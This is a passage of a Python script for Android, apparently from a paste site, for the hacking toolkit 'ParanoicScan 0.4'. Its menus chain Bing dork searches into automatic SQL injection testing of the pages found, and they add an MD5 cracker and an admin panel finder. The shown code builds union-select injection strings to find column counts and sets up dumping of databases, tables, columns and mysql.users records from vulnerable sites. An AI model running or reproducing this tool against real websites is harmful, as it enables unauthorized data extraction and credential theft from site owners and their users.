  652.    op = aplicacion.dialogGetResponse().result
  653.  
  654.    if op["which"] == "positive" :
  655.     menusql()
  656.  
  657.  if opsql==4 :
  658.  
  659.   aplicacion.dialogCreateAlert("SQLI Scanner")
  660.  
  661.   aplicacion.dialogGetInput("SQLI Scanner","Enter DB Name")
  662.   ref = aplicacion.dialogGetResponse().result
  663.  
  664.   if not ref['which'] == 'positive' :
  665.    menusql()
  666.   else:  
  667.    db = ref['value']
  668.  
  669.    aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
  670.    ref = aplicacion.dialogGetResponse().result
  671.  
  672.    if not ref['which'] == 'positive' :
  673.     menusql()
  674.    else:
  675.     tabla = ref['value']
  676.     aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Columns of DB ...")
  677.     aplicacion.dialogShow()
  678.  
  679.     don = showcolumnsdb(webvul,db,tabla)
  680.    
  681.     aplicacion.dialogDismiss()
  682.  
  683.     aplicacion.dialogCreateAlert("SQLI Scanner",don)
  684.     aplicacion.dialogSetPositiveButtonText("Done")
  685.     aplicacion.dialogShow()
  686.  
  687.     op = aplicacion.dialogGetResponse().result
  688.  
  689.     if op["which"] == "positive" :
  690.      menusql()
  691.  
  692.  if opsql==5 :
  693.  
  694.   aplicacion.dialogCreateAlert("SQLI Scanner")
  695.   aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching mysql.users ...")
  696.   aplicacion.dialogShow()
  697.  
  698.   don = mysqluser(webvul)
  699.  
  700.   aplicacion.dialogDismiss()
  701.  
  702.   aplicacion.dialogCreateAlert("SQLI Scanner",don)
  703.   aplicacion.dialogSetPositiveButtonText("Done")
  704.   aplicacion.dialogShow()
  705.  
  706.   op = aplicacion.dialogGetResponse().result
  707.  
  708.   if op["which"] == "positive" :
  709.    menusql()
  710.  
  711.  if opsql==6 :
  712.  
  713.   aplicacion.dialogCreateAlert("SQLI Scanner")
  714.   aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Getting Information ...")
  715.   aplicacion.dialogShow()
  716.  
  717.   don = more(webvul)
  718.  
  719.   aplicacion.dialogDismiss()
  720.  
  721.   aplicacion.dialogCreateAlert("SQLI Scanner",don)
  722.   aplicacion.dialogSetPositiveButtonText("Done")
  723.   aplicacion.dialogShow()
  724.  
  725.   op = aplicacion.dialogGetResponse().result
  726.  
  727.   if op["which"] == "positive" :
  728.    menusql()
  729.  
  730.  if opsql==7 :
  731.  
  732.   aplicacion.dialogCreateAlert("SQLI Scanner")
  733.  
  734.   aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
  735.   ref = aplicacion.dialogGetResponse().result
  736.  
  737.   if not ref['which'] == 'positive' :
  738.    menusql()
  739.   else:  
  740.    tabla = ref['value']
  741.  
  742.    aplicacion.dialogGetInput("SQLI Scanner","Enter Column1")
  743.    ref = aplicacion.dialogGetResponse().result
  744.  
  745.    if not ref['which'] == 'positive' :
  746.     menusql()
  747.    else:
  748.     columna1 = ref['value']
  749.     aplicacion.dialogGetInput("SQLI Scanner","Enter Column2")
  750.     ref = aplicacion.dialogGetResponse().result
  751.     if not ref['which'] == 'positive' :
  752.      menusql()
  753.     else:  
  754.      columna2 = ref['value']
  755.      aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Getting Values ...")
  756.      aplicacion.dialogShow()
  757.  
  758.      don = dumper(webvul,tabla,columna1,columna2)
  759.    
  760.      aplicacion.dialogDismiss()
  761.      aplicacion.dialogCreateAlert("SQLI Scanner",don)
  762.      aplicacion.dialogSetPositiveButtonText("Done")
  763.      aplicacion.dialogShow()  
  764.      op = aplicacion.dialogGetResponse().result
  765.  
  766.      if op["which"] == "positive" :
  767.       menusql()
  768.  
  769.  if opsql==8:
  770.   menu()
  771.  
  772. def menu():
  773.  
  774.  aplicacion.dialogCreateAlert("ParanoicScan 0.4 (C) Doddy Hackman 2015")
  775.  aplicacion.dialogSetItems(["BingHackTool","SQLI Scanner","MD5 Cracker","Admin Finder","Locate IP","HTTP FingerPrinting","Encoders","About","Exit"])
  776.  aplicacion.dialogShow()
  777.  re = aplicacion.dialogGetResponse().result
  778.  re2 = re["item"]
  779.  
  780.  if re2==0:
  781.  
  782.   aplicacion.dialogCreateAlert("BingHack Tool")
  783.  
  784.   aplicacion.dialogGetInput("BingHack Tool","Enter Dork")
  785.   ref = aplicacion.dialogGetResponse().result
  786.  
  787.   if not ref['which'] == 'positive' :
  788.    menu()
  789.   else:  
  790.    dork = ref['value']
  791.  
  792.    aplicacion.dialogGetInput("BingHack Tool","Enter number of pages to search")
  793.    ref = aplicacion.dialogGetResponse().result
  794.  
  795.    if not ref['which'] == 'positive' :
  796.     menu()
  797.    else:
  798.     paginas = ref['value']
  799.  
  800.     paginas = str(paginas)
  801.  
  802.     aplicacion.dialogCreateSpinnerProgress("BingHack Tool","Searching ...")
  803.     aplicacion.dialogShow()
  804.  
  805.     founds = ""
  806.     rez = ""
  807.     rtafinal = ""
  808.  
  809.     founds = bingscan(dork,paginas)
  810.  
  811.     aplicacion.dialogDismiss()
  812.  
  813.     aplicacion.dialogCreateSpinnerProgress("BingHack Tool","Scanning ...")
  814.     aplicacion.dialogShow()
  815.  
  816.     rez = sqltest(founds)
  817.  
  818.     if len(rez) == 0 :
  819.      rtafinal = "[-] Not Found"
  820.     else :
  821.      rtafinal = "[++] Pages Founds\n\n"
  822.      rtafinal = rtafinal + rez
  823.      rtafinal = rtafinal + "\n[++] Finished\n"
  824.  
  825.     aplicacion.dialogDismiss()
  826.  
  827.     aplicacion.dialogCreateAlert("BingHack Tool",rtafinal)
  828.     aplicacion.dialogSetPositiveButtonText("Done")
  829.     aplicacion.dialogShow()
  830.  
  831.     op = aplicacion.dialogGetResponse().result
  832.     if op["which"] == "positive" :
  833.      menu()
  834.  
  835.  if re2==1 :
  836.          
  837.   global webvul
  838.  
  839.   aplicacion.dialogCreateAlert("SQLI Scanner")
  840.  
  841.   aplicacion.dialogGetInput("SQLI Scanner","Enter Page")
  842.   ref = aplicacion.dialogGetResponse().result
  843.  
  844.   if not ref['which'] == 'positive' :
  845.    menu()
  846.   else:  
  847.    web = ref['value']
  848.    aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Scanning ...")
  849.    aplicacion.dialogShow()
  850.  
  851.    pass1,pass2 = bypass("--")
  852.    code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2)
  853.    codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2)
  854.  
  855.    if not code==codedos:
  856.     aplicacion.dialogDismiss()
  857.     aplicacion.dialogCreateAlert("SQLI Scanner","[+] SQLI Detected")
  858.     aplicacion.dialogSetPositiveButtonText("Done")
  859.     aplicacion.dialogShow()
  860.     op = aplicacion.dialogGetResponse().result
  861.     if op["which"] == "positive" :
  862.  
  863.      pass1,pass2 = bypass("--")
  864.      rtacondata = ""
  865.      control_sql = 0
  866.  
  867.      aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Finding columns length")
  868.      aplicacion.dialogShow()
  869.  
  870.      number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
  871.      for te in range(2,30):
  872.       number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
  873.       code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  874.       if(regexver(code)):
  875.        numbers = regexdar(code)
  876.        
  877.        control_sql = 1
  878.  
  879.        rtacondata = rtacondata + "[+] Column length : "+str(te)
  880.        rtacondata = rtacondata + "\n[+] Numbers "+str(numbers)+" print data"
  881.  
  882.        sql = ""
  883.        tex = te + 1
  884.        for sqlix in range(2,tex):
  885.         sql = str(sql)+","+str(sqlix)
  886.         sqli  = str(1)+sql
  887.        sqla = reem(sqli,numbers[0])
  888.        aplicacion.dialogDismiss()
  889.        aplicacion.dialogCreateAlert("SQLI Scanner",rtacondata)
  890.        aplicacion.dialogSetPositiveButtonText("Done")
  891.        aplicacion.dialogShow()
  892.        op = aplicacion.dialogGetResponse().result
  893.        if op["which"] == "positive" :
  894.             webvul = web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla
  895.             menusql()
  896.  
  897.      if control_sql==0:
  898.  
  899.       aplicacion.dialogDismiss()
  900.       aplicacion.dialogCreateAlert("SQLI Scanner","[-] Length dont found")
  901.       aplicacion.dialogSetPositiveButtonText("Done")
  902.       aplicacion.dialogShow()
  903.       op = aplicacion.dialogGetResponse().result
  904.       if op["which"] == "positive" :
  905.        aplicacion.exit()
  906.  
  907.    else:
  908.     aplicacion.dialogDismiss()
  909.     aplicacion.dialogCreateAlert("SQLI Scanner","[-] Not Vulnerable")
  910.     aplicacion.dialogSetPositiveButtonText("Done")
  911.     aplicacion.dialogShow()
  912.     op = aplicacion.dialogGetResponse().result
  913.     if op["which"] == "positive" :
  914.      aplicacion.exit()
  915.  
  916.  if re2==2 :
  917.  
  918.   aplicacion.dialogCreateAlert("MD5 Cracker")
  919.  
  920.   aplicacion.dialogGetInput("MD5 Cracker","Enter MD5")
  921.   ref = aplicacion.dialogGetResponse().result
  922.  
  923.   if not ref['which'] == 'positive' :
  924.    menu()
  925.   else:  
  926.    target = ref['value']
  927.  
  928.    aplicacion.dialogCreateSpinnerProgress("MD5 Cracker","[+] Cracking ...")
  929.    aplicacion.dialogShow()
  930.  
  931.    don = crackmd5(target)
  932.  
  933.    aplicacion.dialogDismiss()
  934.  
  935.    aplicacion.dialogCreateAlert("MD5 Cracker",don)
  936.    aplicacion.dialogSetPositiveButtonText("Done")
  937.    aplicacion.dialogShow()
  938.  
  939.    op = aplicacion.dialogGetResponse().result
  940.  
  941.    if op["which"] == "positive" :
  942.     menu()
  943.  
  944.  if re2==3 :
  945.  
  946.   aplicacion.dialogCreateAlert("Admin Finder")
  947.  
  948.   aplicacion.dialogGetInput("Admin Finder","Enter Target")
  949.   ref = aplicacion.dialogGetResponse().result
  950.  
  951.   if not ref['which'] == 'positive' :
  952.    menu()
  953.   else:  
  954.    target = ref['value']
  955.  
  956.    aplicacion.dialogCreateSpinnerProgress("Admin Finder","[+] Searching ...")
  957.    aplicacion.dialogShow()
  958.  
  959.    don = scanpanel(target)
  960.  
  961.    aplicacion.dialogDismiss()
  962.  
  963.    aplicacion.dialogCreateAlert("Admin Finder",don)
  964.    aplicacion.dialogSetPositiveButtonText("Done")
  965.    aplicacion.dialogShow()
  966.  
  967.    op = aplicacion.dialogGetResponse().result
  968.  
  969.    if op["which"] == "positive" :
  970.     menu()
  971.  
  972.  if re2==4 :
  973.  
  974.   aplicacion.dialogCreateAlert("LocateIP")
  975.  
  976.   aplicacion.dialogGetInput("LocateIP","Enter Target")
  977.   ref = aplicacion.dialogGetResponse().result
  978.  
  979.   if not ref['which'] == 'positive' :
  980.    menu()
  981.   else:
  982.    target = ref['value']
  983.  
  984.    aplicacion.dialogCreateSpinnerProgress("LocateIP","[+] Searching ...")
  985.    aplicacion.dialogShow()
  986.  
  987.    don = locateip(target)
  988.  
  989.    aplicacion.dialogDismiss()
  990.  
  991.    aplicacion.dialogCreateAlert("LocateIP",don)
  992.    aplicacion.dialogSetPositiveButtonText("Done")
  993.    aplicacion.dialogShow()
  994.  
  995.    op = aplicacion.dialogGetResponse().result
  996.  
  997.    if op["which"] == "positive" :
  998.     menu()
  999.  
  1000.  if re2==5 :
  1001.  
  1002.   aplicacion.dialogCreateAlert("HTTP FingerPrinting")
  1003.  
  1004.   aplicacion.dialogGetInput("HTTP FingerPrinting","Enter Target")
  1005.   ref = aplicacion.dialogGetResponse().result
  1006.  
  1007.   if not ref['which'] == 'positive' :
  1008.    menu()
  1009.   else:
  1010.    target = ref['value']
  1011.  
  1012.    aplicacion.dialogCreateSpinnerProgress("HTTP FingerPrinting","[+] Scanning ...")
  1013.    aplicacion.dialogShow()
  1014.  
  1015.    don = httpfinger(target)
  1016.  
  1017.    aplicacion.dialogDismiss()
  1018.  
  1019.    aplicacion.dialogCreateAlert("HTTP FingerPrinting",don)
  1020.    aplicacion.dialogSetPositiveButtonText("Done")
  1021.    aplicacion.dialogShow()
  1022.  
  1023.    op = aplicacion.dialogGetResponse().result
  1024.  
  1025.    if op["which"] == "positive" :
  1026.     menu()
  1027.  
  1028.  if re2==6 :
  1029.   menuencoder()
  1030.  
  1031.  if re2==7 :
  1032.  
  1033.    about = "This program was written by Doddy Hackman in the summer of 2015"
  1034.    aplicacion.dialogCreateAlert("About",about)
  1035.    aplicacion.dialogSetPositiveButtonText("Done")
  1036.    aplicacion.dialogShow()
  1037.  
  1038.    op = aplicacion.dialogGetResponse().result
  1039.  
  1040.    if op["which"] == "positive" :
  1041.     menu()
  1042.  
  1043.  if re2==8 :
  1044.   aplicacion.exit()
  1045.  
  1046. menu()
  1047.  
  1048. # The End ?
Add Comment
Please, Sign In to add comment